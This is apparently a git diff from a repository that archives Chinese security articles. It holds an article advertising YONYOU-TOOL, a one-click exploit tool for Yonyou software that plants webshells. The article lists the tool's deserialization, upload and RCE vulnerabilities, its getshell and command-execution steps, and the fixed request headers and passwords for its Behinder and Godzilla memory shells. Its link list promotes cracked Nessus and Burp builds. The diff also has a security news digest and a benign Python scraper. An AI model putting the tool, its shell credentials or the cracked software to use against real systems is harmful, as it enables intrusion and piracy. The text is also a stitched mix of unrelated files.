[泛微e-office系统UserSelect接口存在未授权访问漏洞](http://mp.weixin.qq.com/s?__biz=MzIxMjEzMDkyMA==&mid=2247486348&idx=1&sn=d432918c3ca047ca2d86b05d23cbe883&chksm=974b868ba03c0f9d74f2553ceed392dff8d314056dccf798398e00dfd4fce3e068dfeb49ce4e&scene=21#wechat_redirect)

View File

@ -0,0 +1,224 @@
# 用友漏洞一键探测利用
信安404 2024-11-15 23:53
![](https://mmbiz.qpic.cn/mmbiz_png/Bj1qIBs69EYsiakcibpq0B02ibF2Z0n3u2KwNu9XFJnqlDhE6qzicE6xyIurVjDia8bDe3lV9g1gxDgHYtYGWYDbSCw/640?wx_fmt=other&wxfrom=5&wx_lazy=1&wx_co=1&tp=webp&random=0.7055136587036346 "")
点击上方
蓝字关注我们
![](https://mmbiz.qpic.cn/sz_mmbiz_png/seOiamWTSmsMeWr9yz9ItMSV05SovRq18qcL3fAdlwYbRTNibVvLUbg9mAmVfYddrcquYTyIWpfyOCqvT17oLPYw/640?wx_fmt=other&wxfrom=5&wx_lazy=1&wx_co=1&tp=webp&random=0.04016279763770925 "")
## 免责声明
> ❝
> 本公众号所发布的文章及工具只限交流学习,本公众号不承担任何责任!如有侵权,请告知我们立即删除。
介绍
用友漏洞一键探测利用。
- 项目地址https://github.com/Chave0v0/YONYOU-TOOL
- 有release
- 开源
支持漏洞
```
ActionHandlerServlet 反序列化
Lfw_Core_Rpc 文件上传
BshServlet RCE
jsinvoke 文件上传
accept.jsp 文件上传
DeleteServlet 反序列化
MxServlet 反序列化
DownloadServlet 反序列化
FileReceiveServlet 文件上传
Fs_Update_DownloadServlet 反序列化
MonitorServlet 反序列化
UploadServlet 反序列化
NCMessageServlet 反序列化
XbrlPersistenceServlet 反序列化
ECFileManageServlet 反序列化
ModelHandleServlet 反序列化
ResourceManagerServlet 文件上传
GroupTemplet 文件上传
LfwFileUploadServlet 文件上传
IMsgCenterWebService JNDI注入uploadChunk 文件上传
billitem 文件上传
```
## 使用说明
```
java -jar YONYOU-TOOL-[version].jar
```
目前实现功能模块:漏洞探测、一键 getshell、命令执行、文件上传。
![](https://mmbiz.qpic.cn/sz_mmbiz_png/a1BOUvqnbrgKeMDekjA8KRnSMicf6T2uliceTxxUwQbWK89u7MF3VxwXks0cuZ3VfUmNrmELTKHFkDlIDApxnGDw/640?wx_fmt=png&from=appmsg "")
## 漏洞探测
以 ActionHandlerServlet 反序列化 漏洞为例。
选择漏洞,填写必要信息,点击探测,可自行在 dnslog 平台查看结果。
经测试,部分站点反序列化漏洞状态码 404、500 均有 dnslog建议以 dnslog 平台记录为准。
![](https://mmbiz.qpic.cn/sz_mmbiz_png/a1BOUvqnbrgKeMDekjA8KRnSMicf6T2ul46sdNysYq1Nyo2RoiaYia6cGRwNqaZSb6aNoFBWfRH3JPPhSln9Z8arQ/640?wx_fmt=png&from=appmsg "")
## 一键 getshell
本工具一键 getshell 功能打入的 webshell 同时打入回显、冰蝎、哥斯拉。请求头与连接密码信息均为下方所示。
反序列化漏洞打入内存马情况以实际连接情况为准。
```
Filter 内存马连接地址http://x.x.x.x/...网站目录.../*--------------------------------------------------------------------------------------------
回显
添加请求头
x-client-referer:http://www.baidu.com/
x-client-data:testzxcv
testzxcv:<base64编码后命令>--------------------------------------------------------------------------------------------
冰蝎
添加请求头
x-client-referer:http://www.baidu.com/
x-client-data:behinder
密码
chaveyyds--------------------------------------------------------------------------------------------
哥斯拉
添加请求头
x-client-referer:http://www.baidu.com/
x-client-data:godzilla
密钥
chaveyyds
密码
pass
```
以 Lfw_Core_Rpc 文件上传 漏洞为例。
选择漏洞输入目标url点击 getshell。
![](https://mmbiz.qpic.cn/sz_mmbiz_png/a1BOUvqnbrgKeMDekjA8KRnSMicf6T2ulpjTkhjb6QXlvjEg3YN7ZdDcqb5J3vHTN1LBSMez8Vau0C1cA7MRBRA/640?wx_fmt=png&from=appmsg "")
根据连接信息连接利用即可。
![](https://mmbiz.qpic.cn/sz_mmbiz_png/a1BOUvqnbrgKeMDekjA8KRnSMicf6T2ulzeTHGjAia7b6Uq4icADsNpHgTyrzYNIWCJPd78VaMI3bpqzHJvuicNz1A/640?wx_fmt=png&from=appmsg "")
![](https://mmbiz.qpic.cn/sz_mmbiz_png/a1BOUvqnbrgKeMDekjA8KRnSMicf6T2ul7lvFMMsaoQqcTOIawH3efCVD4Miam1Yukvz33kQFEgicGfTv7Gzevpiaw/640?wx_fmt=png&from=appmsg "")
![](https://mmbiz.qpic.cn/sz_mmbiz_png/a1BOUvqnbrgKeMDekjA8KRnSMicf6T2ul9zk3s3hZ0evWzkWVhEs2e93LFXu60UAbSYzrhuVfkjF5J9WPAGVHdQ/640?wx_fmt=png&from=appmsg "")
## 命令执行
以 ActionServletHandler 反序列化 漏洞为例。
进入 命令执行 模块,输入命令,点击执行即可,目前该漏洞已支持 CC6 与 freemarker.template.utility.Execute 两种命令执行。
![](https://mmbiz.qpic.cn/sz_mmbiz_png/a1BOUvqnbrgKeMDekjA8KRnSMicf6T2ul0znTsnFJiabeoDNMHqpe3xCicez5DFbLJeSV7HXIZ4U1Qrl2Skia51lZQ/640?wx_fmt=png&from=appmsg "")
## 文件上传
以 Lfw_Core_Rpc 文件上传 漏洞为例。
选择漏洞,进入文件上传模块,输入文件名,文件内容,点击上传即可。
![](https://mmbiz.qpic.cn/sz_mmbiz_png/a1BOUvqnbrgKeMDekjA8KRnSMicf6T2ulYoBC2GaD2pSRkmDmrrwzBpLt3YsAZyZ7Osb9T5VqSnLDVQA5Yrm29Q/640?wx_fmt=png&from=appmsg "")
![](https://mmbiz.qpic.cn/sz_mmbiz_png/a1BOUvqnbrgKeMDekjA8KRnSMicf6T2ul6hibqm8pab7ibmJicRQyA3axn56JfarvOIfbB3nP2Mjpg8CtYD2Fu0Omg/640?wx_fmt=png&from=appmsg "")
往期推荐
[ 【工具更新】Nessus 最新windows版Cracked附下载 ](http://mp.weixin.qq.com/s?__biz=Mzk0NjQ5MTM1MA==&mid=2247492604&idx=1&sn=6f3605c2656dd9e273269a6d5f816037&chksm=c307f945f47070539b54c8cdae2058c1c72cd11b74c439c111bb14c4a0b8c59a688c50031227&scene=21#wechat_redirect)
[ 又一款新的红队资产收集工具!! ](http://mp.weixin.qq.com/s?__biz=Mzk0NjQ5MTM1MA==&mid=2247492564&idx=1&sn=4e64080457a91a0055cc44f3b6bc8d46&chksm=c307f96df470707bcc9caefe6410e77b8b6db6821e943da2a93cbc4867d4862aa6b62dce3697&scene=21#wechat_redirect)
[ 0day 挖到手软403 到 getshell ](http://mp.weixin.qq.com/s?__biz=Mzk0NjQ5MTM1MA==&mid=2247492554&idx=1&sn=79d368cda39d6845d7774be7e5c470a4&chksm=c307f973f47070656be9495fecf57d0e9ca594040dd5ad68816fb8cd974801df969fe3fe0cd0&scene=21#wechat_redirect)
[ 自动化Android App隐私合规检测工具|APP渗透 ](http://mp.weixin.qq.com/s?__biz=Mzk0NjQ5MTM1MA==&mid=2247492543&idx=1&sn=bb97fc060fd780a452d875438cf83f3d&chksm=c307f906f470701026b4abefe89dd3883ffc705c86c3bd6bf4c41807916df5b939864cf096b3&scene=21#wechat_redirect)
[ 一款牛X的WiFi无线密码暴力破解工具 ](http://mp.weixin.qq.com/s?__biz=Mzk0NjQ5MTM1MA==&mid=2247492524&idx=1&sn=4dfca1dc45e2b911a57490cbdcb93fa7&chksm=c307f915f4707003c0ceef2f4e49158cf886a13f43a64082e9e3b5baf111bc7d7967c9c1292f&scene=21#wechat_redirect)
[ 【工具更新】BurpSuite最新2024.9版Windows/Linux/Mac附下载 ](http://mp.weixin.qq.com/s?__biz=Mzk0NjQ5MTM1MA==&mid=2247492496&idx=1&sn=30723f691c20d9efd9077caace214651&chksm=c307f929f470703f00155504aff03f41c5ac11d518a0c9915cddce2d386329952e183e590957&scene=21#wechat_redirect)
[ 自动化反编译微信小程序工具 - KillWxapkg ](http://mp.weixin.qq.com/s?__biz=Mzk0NjQ5MTM1MA==&mid=2247492424&idx=1&sn=8a31e23df6eefb5c74378ea62690f145&chksm=c307f9f1f47070e7d4fb7545872b76def4d60daf7cd6d126a60dbae069bdbb7ccc4d715d7c98&scene=21#wechat_redirect)
[ 渗透测试报告一键生成工具 ](http://mp.weixin.qq.com/s?__biz=Mzk0NjQ5MTM1MA==&mid=2247492384&idx=1&sn=21256a28e9a73cefa810ab745cbb80ad&chksm=c307f999f470708fa76e8b1acec8322d4a73ae5f9d88bbba570de7131b61c66bc81a5e957899&scene=21#wechat_redirect)
[ 如何使用 BeEF 黑客工具 (2024) ](http://mp.weixin.qq.com/s?__biz=Mzk0NjQ5MTM1MA==&mid=2247492339&idx=1&sn=6814d0252805d664b15d137469b4f35f&chksm=c307f84af470715cc4901802881f9dfbfd73a379031708151c57dcf9fc8ebb73b853cb7513fb&scene=21#wechat_redirect)
[ 【工具推荐】一款多用途burp插件 ](http://mp.weixin.qq.com/s?__biz=Mzk0NjQ5MTM1MA==&mid=2247492334&idx=1&sn=fedcc43e6647e7b46911c1d57dbde188&chksm=c307f857f47071419fc32da9ddb9371d5047687df35ecea9898310a9a23f6e9e3e8b0f2a11c9&scene=21#wechat_redirect)
[ ScopeSentry-V1.4-端口扫描更新 ](http://mp.weixin.qq.com/s?__biz=Mzk0NjQ5MTM1MA==&mid=2247492312&idx=1&sn=c0a046dce8c4e9a7e5c0bc09cdfe26b3&chksm=c307f861f4707177e114020f30aed98496d10d8ea7d8a7b7fbc0ec96c56cab10bf4810018204&scene=21#wechat_redirect)
[ WmiExec可视化利用工具 ](http://mp.weixin.qq.com/s?__biz=Mzk0NjQ5MTM1MA==&mid=2247492294&idx=1&sn=6b389ad16748b3e116421b054e91c305&chksm=c307f87ff47071697a22c251c33b7a02f8da7dd9d616684d71f672fa18a60ba9dd73e4702e14&scene=21#wechat_redirect)
[ Zip-password-finder 压缩包爆破工具 ](http://mp.weixin.qq.com/s?__biz=Mzk0NjQ5MTM1MA==&mid=2247492233&idx=1&sn=176ab6137bb43a245478732e296d79ef&chksm=c307f830f4707126e1e9e89fc6cf0cb3bbcd74f48c75438f010acaa296baf2aaf370a1c82b39&scene=21#wechat_redirect)
[ One-Fox工具箱V8.2中秋特别优化版发布 ](http://mp.weixin.qq.com/s?__biz=Mzk0NjQ5MTM1MA==&mid=2247492221&idx=1&sn=8704e9ab79ef4da0264030170053c12f&chksm=c307f8c4f47071d21e9928eaa020fa7f85640804583ca08820794e1da2bdc21f4cd4b92f45ea&scene=21#wechat_redirect)
[ 【真单兵武器库】统领0.7.5 “应急响应” ](http://mp.weixin.qq.com/s?__biz=Mzk0NjQ5MTM1MA==&mid=2247492211&idx=1&sn=bee3ea07004ee0996a664ff984947a0c&chksm=c307f8caf47071dc53fa24f235e3a201aaf8239ad3eac45b2eb5917e0706849648c065541820&scene=21#wechat_redirect)
[ 一款能够自动化过滤扫描结果的目录扫描工具 ](http://mp.weixin.qq.com/s?__biz=Mzk0NjQ5MTM1MA==&mid=2247492201&idx=1&sn=8e3f6feae0cbd192c436ed9eb17c3961&chksm=c307f8d0f47071c6fc7924f0c0eec6c9ced34c22191ede6fea1574b66054663bafbc7544e1e1&scene=21#wechat_redirect)

View File

@ -0,0 +1,231 @@
# 远程代码执行风险威胁用户安全Zoom紧急修复多个安全漏洞颠覆传统安全架构Zscaler创新发布新型零信任分段方案 | 牛览
安全牛 2024-11-15 10:54
点击蓝字·关注我们 
/ 
aqniu
![](https://mmbiz.qpic.cn/mmbiz_png/kuIKKC9tNkBjwIRcuxcIx3fvDBydiaqkxw4o55dLPMJBKVsRbYl7ULkJDmFtatY9fWSIcZttiaeQm76cm0TXSBCA/640?wx_fmt=other&from=appmsg&wxfrom=5&wx_lazy=1&wx_co=1&tp=webp "")
**新闻速览**
•世界互联网大会“互联网之光”博览会“网络安全主题展”11月19日开展
•黑客组织假冒猎头瞄准航空航天人才实施针对性钓鱼攻击
•研究人员成功破解利用BitLocker加密的新型勒索软件
•远程代码执行风险威胁用户安全Zoom紧急修复多个安全漏洞
•KVM基础架构曝高危漏洞Apache CloudStack项目发布紧急修复
•Google正式发布Chrome 131稳定版修复多个关键安全漏洞
•Splunk发布新一代可观测性解决方案全面提升业务洞察能力
•颠覆传统安全架构Zscaler创新发布新型零信任分段方案
**特别关注**
**世界互联网大会“互联网之光”博览会“网络安全主题展”11月19日开展**
2024年世界互联网大会“互联网之光”博览会将于11月19日至22日在浙江乌镇举行。本届“网络安全主题展”贯彻落实总体国家安全观和党的二十届三中全会精神设置了“独立特装展”“国家网络安全教育技术产业融合发展试验区成果展”“网络安全学院成果展”“网络安全综合性成果展”等展区相比前几届主题更加鲜明内容更加丰富。
一、时间及地点
11月19日至22日
乌镇互联网国际会展中心展览中心3号展厅互联网之光博览会B3馆
二、主办单位
中国网络空间安全协会
三、特别支持单位
国家电网有限公司、中国移动通信集团公司、中国联合网络通信集团有限公司、云网基础设施安全国家工程研究中心、长安通信科技有限责任公司、奇安信科技集团股份有限公司、天融信科技集团股份有限公司
杭州安恒信息技术股份有限公司、网宿科技股份有限公司
 
原文链接:
https://mp.weixin.qq.com/s/O1fBaJN93WtmmIR8CMrtKA
**网络攻击**
**黑客组织假冒猎头瞄准航空航天人才实施针对性钓鱼攻击**
ClearSky安全研究机构最新披露黑客组织TA455自2023年9月以来在LinkedIn等社交平台上发起了一轮针对性网络钓鱼攻击其主要目标为航空航天领域的专业人士。
据ClearSky分析攻击者通过伪装成航空航天行业的招聘顾问与目标建立联系后在获得受害者信任后诱导对方下载一个名为"SIgnedConnection.zip"的压缩包并提供PDF指南诱导受害者"安全"地下载和打开这些文件。
技术分析显示该压缩包中包含的可执行文件会通过DLL侧加载技术向受害者设备植入恶意程序。具体而言攻击者通过加载名为"secure32.dll"的DLL文件实现在目标系统中运行隐蔽代码。随后恶意程序会启动感染链最终部署Snail Resin恶意软件并开启一个名为"SlugResin"的后门。
为规避检测该组织采用了多种高级对抗技术一方面在GitHub平台上对命令控制C2通信进行编码使传统检测工具难以识别威胁另一方面模仿Lazarus Group的攻击特征造成归因困难。
原文链接:
https://www.darkreading.com/cyberattacks-data-breaches/iranian-cybercriminals-aerospace-workers-linkedin
**研究人员成功破解利用BitLocker加密的新型勒索软件**
Bitdefender安全公司日前发布了针对ShrinkLocker勒索软件的解密工具。这款勒索软件利用Windows内置的BitLocker驱动器加密工具来锁定受害者文件此次发布的解密工具可以帮助受害者免费恢复被加密的数据。
尽管ShrinkLocker的勒索技术实现相对简单但其破坏性不容小觑。ShrinkLocker的技术手段并不高明不同于传统勒索软件使用自定义加密实现而是利用Windows BitLocker并生成随机密码发送给攻击者。攻击过程首先通过Windows Management InstrumentationWMI查询检查目标系统是否安装了BitLocker随后攻击者会移除所有默认保护机制并使用"-UsedSpaceOnly"参数仅加密磁盘已使用空间以提高效率。该勒索软件使用网络流量和内存使用数据生成随机密码使暴力破解变得困难同时删除和重新配置所有BitLocker保护器增加加密密钥恢复的难度。
Bitdefender的解密工具通过识别BitLocker加密磁盘删除保护器后的特定恢复窗口成功实现了攻击者设置的密码恢复。受害者可以通过USB驱动器使用该工具在BitLocker恢复界面进入恢复模式通过高级选项访问命令提示符来启动解密工具。
原文链接:
https://www.bleepingcomputer.com/news/security/new-shrinklocker-ransomware-decryptor-recovers-bitlocker-password/
**漏洞预警**
**远程代码执行风险威胁用户安全Zoom紧急修复多个安全缺陷**
近日Zoom官方修复了其应用程序套件中存在多个安全缺陷其中最严重的缺陷可能允许攻击者执行远程代码。这些漏洞影响范围广泛涉及Windows、macOS、iOS、Android和Linux等多个平台的Zoom产品。
其中最严重的是一个缓冲区溢出缺陷CVSS评分高达8.5。该缺陷可能允许已认证用户通过网络访问提升权限进而执行远程代码。受影响的产品包括Zoom Workplace App、Rooms Client、Video SDK和Meeting SDK等核心应用。还有一个严重缺陷涉及输入验证不当问题。可能使未经身份验证的用户通过网络访问泄露敏感信息。
此外Zoom还披露了多个中等严重级别的安全缺陷涉及输入验证不当可能导致拒绝服务攻击、资源消耗控制不当可能引发拒绝服务、macOS安装程序中的符号链接跟随缺陷以及macOS安装程序中的资源消耗控制不当可能导致信息泄露等问题。
这些漏洞主要影响6.2.0版本之前的大多数产品部分macOS特定漏洞存在于6.1.5版本之前。Zoom建议用户通过官方网站更新到最新版本以防范潜在的漏洞利用。
原文链接:
https://cybersecuritynews.com/zoom-app-vulnerability/
**KVM基础架构曝高危漏洞Apache CloudStack项目发布紧急修复**
Apache CloudStack项目日前发布重要安全更新修复了其KVM基础架构中的严重漏洞CVE-2024-50386。此次发布的LTS安全版本4.18.2.5和4.19.1.3修补了一个可能允许攻击者入侵KVM环境的重大缺陷。
该漏洞CVSS v3.1基准评分为8.5高危影响Apache CloudStack 4.0.0至4.18.2.4版本以及4.19.0.0至4.19.1.2版本。安全问题源于模板注册过程中缺少对KVM兼容模板的验证检查。攻击者可能通过利用此漏洞部署恶意实例进而未经授权访问主机文件系统危及CloudStack管理的KVM基础架构的完整性、机密性和可用性。
为降低风险CloudStack强烈建议管理员立即升级至修补版本4.18.2.5、4.19.1.3或更高版本。运行4.19.1.0之前版本的用户应跳过中间更新直接升级至4.19.1.3。同时CloudStack还为管理员提供了扫描和验证现有KVM兼容模板的指导包括在基于文件的主存储上运行特定命令以识别潜在受损磁盘。
 
原文链接:
https://cybersecuritynews.com/critical-kvm-infrastructure-vulnerabilities/
**Google正式发布Chrome 131稳定版修复多个关键安全漏洞**
Google公司日前发布了Chrome 131稳定版针对Windows、Mac和Linux平台修复了12个安全漏洞其中包括多个高危和中危漏洞。该更新将在未来数周内陆续推送。
在此次修复的漏洞中最严重的是由Solidlab公司的Vsevolod Kokorin发现的一个高危漏洞CVE-2024-11110。该漏洞与Chrome浏览器渲染引擎Blink中的不当实现有关。
其他重要修复还包括自动填充实现缺陷CVE-2024-11111、媒体组件中的释放后使用漏洞CVE-2024-11112、无障碍功能中的释放后使用问题CVE-2024-11113、Views组件中的不当实现CVE-2024-11114以及导航功能中的策略执行不足CVE-2024-11115。此外Chrome安全团队还解决了一个长期存在的绘制实现问题CVE-2024-11116和一个低危的文件系统实现漏洞CVE-2024-11117
为确保大多数用户能在潜在漏洞利用代码公开前完成更新Google限制了部分漏洞细节的访问权限。Google建议用户尽快更新浏览器以防范安全风险。用户可以通过Chrome设置中的"关于Chrome"选项手动检查并安装最新版本。
原文链接:
https://cybersecuritynews.com/chrome-131-released/
**行业动态**
**Splunk发布新一代可观测性解决方案全面提升业务洞察能力**
Splunk公司日前宣布全面升级其可观测性产品组合通过Splunk AppDynamics的技术支持帮助IT运维和工程团队更快速地发现和解决性能问题为组织提供更强大的业务运营性能可视化能力。
在当今混合和现代化环境下许多组织面临技术基础设施可视性分散的挑战这严重影响了其理解性能对运营影响的能力。Splunk可观测性产品负责人Patrick Lin表示注入更完整的业务上下文信息是克服当今混合现代环境中分散可视性和安全盲点的关键。Splunk的可观测性产品组合在AppDynamics的加持下能够为客户提供必要的业务上下文帮助其了解问题的根源及其影响范围。
此次升级的核心点包括:
- 将Cisco AppDynamics整合入Splunk可观测性产品组合实现跨环境的统一体验
- 引入单点登录、增强用户界面并推出Log Observer Connect功能将Splunk AppDynamics的可视化与Splunk平台上的详细日志关联起来
- 通过AI增强和基础设施监控来减少故障排查工作量为ITOps团队提供更有效的工具简化环境导航和深入分析流程。
原文链接:
https://www.sdxcentral.com/articles/stringerai-announcements/splunk-enhances-observability-portfolio-for-better-business-insights/2024/11/
**颠覆传统安全架构Zscaler创新发布新型零信任分段方案**
Zscaler公司宣布正式推出行业创新的零信任分段解决方案通过创新技术打造更安全、高效的连接方案以应对分布式环境下日益复杂的网络安全挑战。
在数字化转型浪潮中企业业务遍布各地分支机构、数据中心和云平台传统的防火墙、VPN和SD-WAN等安全方案不仅成本高昂且复杂还可能无意中扩大了攻击面特别是在应对勒索软件时。
Zscaler的零信任分段方案将零信任原则扩展到分支机构、工厂和公有云等多样化环境。该解决方案将每个位置转变为安全隔离的"孤岛"通过云实现无缝通信无需复杂的基于硬件的防护。系统通过Zero Trust Exchange云平台在设备和工作负载层面实施基于云的分段每个分支或位置作为独立的网络实体仅通过执行特定业务策略的受控安全通道进行通信。
IIFL首席信息安全官Shanker Ramrakhiani对此表示Zscaler的零信任云使他们能够在数据中心和多个云环境中执行一致的安全策略简化运营并显著降低横向威胁移动的风险。
原文链接:
https://cybermagazine.com/articles/zscaler-powering-a-new-era-of-zero-trust-with-segmentation
![](https://mmbiz.qpic.cn/mmbiz_png/kuIKKC9tNkAfZibz9TQ8KWj4voxxxNSGMnicXSRCtG4URyLibbqPegjnnibfRB0z4zIzwghbLOkV5fqGYM8vhuQdqw/640?wx_fmt=other&wxfrom=5&wx_lazy=1&wx_co=1&tp=webp "")
合作电话18311333376
合作微信aqniu001
投稿邮箱editor@aqniu.com
![](https://mmbiz.qpic.cn/mmbiz_gif/kuIKKC9tNkAfZibz9TQ8KWj4voxxxNSGMAGiauAWicdDiaVl8fUJYtSgichibSzDUJvsic9HUfC38aPH9ia3sopypYW8ew/640?wx_fmt=gif&wxfrom=5&wx_lazy=1&tp=webp "")

1
requirements.txt Normal file
View File

@ -0,0 +1 @@
requests

107
run.py Normal file
View File

@ -0,0 +1,107 @@
import os
import re
import json
import platform
import tempfile
import requests
import shutil
import subprocess
import datetime
def write_json(path, data, encoding="utf8"):
"""写入json"""
with open(path, "w", encoding=encoding) as f:
json.dump(data, f, ensure_ascii=False, indent=4)
def read_json(path, default_data={}, encoding="utf8"):
"""读取json"""
data = {}
if os.path.exists(path):
try:
data = json.loads(open(path, "r", encoding=encoding).read())
except:
data = default_data
write_json(path, data, encoding=encoding)
else:
data = default_data
write_json(path, data, encoding=encoding)
return data
def get_executable_path():
'''获取可执行文件路径'''
system = platform.system()
if system == 'Windows':
executable_path = './bin/wechatmp2markdown-v1.1.9_win64.exe'
else:
executable_path = './bin/wechatmp2markdown-v1.1.9_linux_amd64'
# 添加执行权限
os.chmod(executable_path, 0o755)
# 返回可执行文件的完整路径
return executable_path
def get_md_path(executable_path,url):
'''获取md文件路径'''
temp_directory = tempfile.mkdtemp()
command = [executable_path, url, temp_directory, '--image=url']
subprocess.check_output(command)
for root, _, files in os.walk(temp_directory):
for file in files:
if file.endswith(".md"):
file_path = os.path.join(root, file)
yield file_path
def get_today_url():
'''获取今日url'''
current_date = datetime.datetime.now().strftime("%Y-%m-%d")
base_url = 'https://raw.githubusercontent.com/BruceFeIix/picker/refs/heads/master/archive/daily/{}/{}.md'.format(current_date[:4], current_date)
headers = {
'accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7',
'accept-language': 'zh-CN,zh;q=0.9,en;q=0.8,en-GB;q=0.7,en-US;q=0.6',
'cache-control': 'no-cache',
'pragma': 'no-cache',
'priority': 'u=0, i',
'referer': 'https://github.com/BruceFeIix/picker',
'sec-ch-ua': '"Chromium";v="130", "Microsoft Edge";v="130", "Not?A_Brand";v="99"',
'sec-ch-ua-mobile': '?0',
'sec-ch-ua-platform': '"Windows"',
'sec-fetch-dest': 'document',
'sec-fetch-mode': 'navigate',
'sec-fetch-site': 'cross-site',
'sec-fetch-user': '?1',
'upgrade-insecure-requests': '1',
'user-agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/130.0.0.0 Safari/537.36 Edg/130.0.0.0',
}
try:
response = requests.get(
base_url,
headers=headers,
)
urls = re.findall('(?:复现|漏洞|CVE-\d+|CNVD-||POC|EXP).*?(https://mp.weixin.qq.com/(?:[a-zA-Z]|[0-9]|[$-_@.&+]|[!*]|(?:%[0-9a-fA-F][0-9a-fA-F]))+)',response.text,re.I)
urls = [url.rstrip(')') for url in urls]
return urls
except:
return []
def main():
'''主函数'''
data_file = 'data.json'
data = {}
executable_path = get_executable_path()
result_path = 'doc'
os.makedirs(result_path,exist_ok=True)
# 读取历史记录
data = read_json(data_file, default_data=data)
for url in get_today_url():
if url in data:
continue
for file_path in get_md_path(executable_path, url):
name = os.path.splitext(os.path.basename(file_path))[0]
shutil.copy2(file_path,result_path)
data[url] = name
write_json(data_file,data)
print(name,end='')
if __name__ == '__main__':
main()